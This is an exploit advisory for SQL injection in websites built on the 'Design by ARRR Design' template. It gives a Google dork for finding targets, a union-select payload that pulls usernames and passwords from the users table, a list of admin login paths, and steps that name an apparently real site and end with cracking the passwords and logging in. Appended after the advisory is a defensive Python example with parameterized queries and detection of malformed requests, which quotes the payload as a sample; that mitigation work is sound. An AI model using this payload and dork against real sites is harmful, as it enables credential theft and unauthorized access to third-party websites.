Design by ARRR Design Get Username & Password SQLi

2016.10.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#####################################################
Exploit Title: Design by ARRR Design Get Username & Password
Exploit Author: ./MalingSendal - Trenggalek Cyber Army
Dork : intext:"Design by ARRR Design"
Date : 2016/10/07
Tested on : Win 10
#####################################################
Exploit :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
(If Forbidden You Can Use Hackbar Modif To Bypass it)
#####################################################
Login Admin :
http://www.site.com/adminweb
http://www.site.com/admin
http://www.site.com/login
http://www.site.com/redaktur
http://www.site.com/redakturweb
http://www.site.com/administrator
http://www.site.com/login@web
http://www.site.com/adminpanel
http://www.site.com/login
http://www.site.com/admin
#####################################################
POC :
1. Go to Google & Search The Dork
2. If You Already Get the Site
   ex : http://larisgrosir.com/kategori-45-properti.html
3. Put The Exploit
   ex : http://larisgrosir.com/kategori-45-properti.html
   ex : http://larisgrosir.com/kategori-45'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-properti.html
4. Yeah , In The Title Will Appear The Username & Password
5. Crack The Password & Login in Admin Panel
6. Enjoy :)
#####################################################
Trenggalek Cyber Army | facebook.com/officialtrenggalekcyberarmy/
Greetz : CowoKerensTeam - Sanjungan Jiwa - IndoXploit - All Hacker Indonesia | -> Stay Cool & Fuck Xai Syndicate <-
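Mitigation and detection for the injection point shown in the POC, as an added example that is not part of the advisory or the affected product's code: the category id in the rewritten URL is parsed strictly as digits and passed to the query as a bound parameter, and the same parser flags requests that do not fit the route. The route pattern, the `categories` table, the function names and the use of Python with SQLite as a stand-in for the site's stack are assumptions.

```python
import re
import sqlite3

# Assumed route shape, inferred from the example URL in the advisory:
# /kategori-<numeric id>-<slug>.html
ROUTE = re.compile(r"/kategori-(\d{1,9})-([a-z0-9-]{1,80})\.html", re.ASCII)

def parse_category_id(path):
    """Return the category id as an int, or None if the path is not a clean route."""
    m = ROUTE.fullmatch(path)
    return int(m.group(1)) if m else None

def fetch_category(conn, path):
    """Look up a category with a bound parameter instead of string concatenation."""
    cat_id = parse_category_id(path)
    if cat_id is None:
        return None  # caller should answer 404 and log the request
    row = conn.execute(
        "SELECT name FROM categories WHERE id = ?", (cat_id,)
    ).fetchone()
    return row[0] if row else None

def flag_suspicious(paths):
    """Detection side: kategori-* requests that fail strict route parsing."""
    return [p for p in paths
            if p.startswith("/kategori-") and parse_category_id(p) is None]

def demo_db():
    """Constructed in-memory database; table layout is hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO categories VALUES (45, 'properti')")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-hash')")
    return conn

# Constructed request paths; the second carries the payload quoted in the advisory.
SAMPLE_PATHS = [
    "/kategori-45-properti.html",
    "/kategori-45'union+select+make_set(6,@:=0x0a,(select(1)from(users)"
    "where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-properti.html",
    "/index.html",
]

if __name__ == "__main__":
    db = demo_db()
    for p in SAMPLE_PATHS:
        print(repr(fetch_category(db, p)), p[:40])
    print("flagged:", len(flag_suspicious(SAMPLE_PATHS)))
```
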

References:

https://www.facebook.com/officialtrenggalekcyberarmy/

